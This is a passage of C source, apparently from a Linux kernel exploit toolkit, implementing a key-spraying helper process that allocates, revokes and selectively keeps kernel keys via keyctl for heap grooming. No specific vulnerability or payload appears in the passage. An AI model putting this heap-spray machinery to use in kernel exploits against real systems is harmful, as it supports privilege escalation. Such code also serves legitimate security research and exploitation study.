      void* stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
      FAIL_IF(stack == MAP_FAILED);
      helper.stack = stack;
    }

    // clone() stacks grow downwards: pass the top of the mapping.
    helper.pid = clone(&spray_worker, (char*)helper.stack + 0x4000, CLONE_VM, NULL);
    FAIL_IF(helper.pid < 0);
  }

  return 0;
}

// Ask the helper process to allocate `n` keys of `type` carrying `payload`.
// Returns the helper's result (0 on success, -1 on failure).
int spray(int type, int n, void* payload, size_t plen) {
  FAIL_IF(ensure_helper() != 0);

  // Fill in the request before raising event_begin; the helper is parked
  // in EVENT_WAIT until then.
  shm.u.add_args.n = n;
  shm.u.add_args.plen = plen;
  shm.u.add_args.payload = payload;
  shm.u.add_args.type = type;
  shm.target = CMD_spray_keys;

  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  return shm.err;
}

// Revoke every tracked key (proxied to the helper process).
// Returns the helper's result (0 on success, -1 on failure).
int spray_reset() {
  FAIL_IF(ensure_helper() != 0);

  shm.target = CMD_reset_keys;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);
  return shm.err;
}

// Revoke all sprayed keys EXCEPT those matching an entry in `ids`.
// An entry matches by id OR by type, so callers pass .id = -1 to keep a
// whole type class, or .type = -1 to keep a single key id.
// Returns the helper's reset result (0 on success, -1 on failure).
int spray_reset_except(struct key *ids, size_t num_ids) {
  FAIL_IF(ensure_helper() != 0);

  // Worst case everything is kept; reserve room for a full copy.
  // NOTE(review): if info.num_keys == 0, calloc(0, ...) may legally return
  // NULL and this would report a spurious failure — confirm callers never
  // hit that case.
  struct key* tmp = calloc(info.num_keys, sizeof(struct key));
  FAIL_IF(tmp == NULL);

  int num_saved = 0;
  for (int i = 0; i < info.num_keys; i++) {
    // NOTE(review): int j vs size_t num_ids is a signed/unsigned compare;
    // harmless for the small counts used here.
    for (int j = 0; j < num_ids; j++) {
      if (info.keys[i].id == ids[j].id || info.keys[i].type == ids[j].type) {
        // Move the kept entry to tmp, then compact info.keys with a
        // swap-with-last so the helper only revokes what remains.
        tmp[num_saved] = info.keys[i];
        num_saved++;

        info.keys[i] = info.keys[info.num_keys - 1];
        info.num_keys--;
        i--;  // re-examine the entry swapped into slot i
        break;
      }
    }
  }

  // The helper (same address space via CLONE_VM) revokes the leftovers.
  shm.target = CMD_reset_keys;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  // Swap the bookkeeping array for the saved subset.
  free(info.keys);
  info.keys = tmp;
  info.num_keys = num_saved;

  return shm.err;
}

// Stop the helper process and release its stack.
// Returns the helper's final shm.err value.
int spray_exit() {
  FAIL_IF(ensure_helper() != 0);

  shm.target = CMD_stop;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  // Give the helper a moment to actually exit before unmapping its stack.
  sleep(1);
  munmap(helper.stack, 0x4000);
  // Clear the cached stack pointer: ensure_helper() would otherwise reuse
  // the now-unmapped region as a clone() stack if the helper is respawned.
  helper.stack = NULL;
  helper.pid = -1;

  return shm.err;
}

// Read-only access to the index-th tracked key record, or NULL past the end.
const struct key* get_key(unsigned index) {
  if (index < (unsigned)info.num_keys) {
    return &info.keys[index];
  }
  return NULL;
}


// Public keyctl() entry point: proxies the call to the helper process so the
// syscall runs under the helper's key ownership (see __keyctl for the direct
// wrapper the helper uses itself).
long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
  FAIL_IF(ensure_helper() != 0);

  const unsigned long args[4] = { arg2, arg3, arg4, arg5 };
  shm.u.keyctl_args.option = option;
  memcpy(shm.u.keyctl_args.args, args, sizeof(args));

  shm.target = CMD_keyctl;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  return shm.err;
}
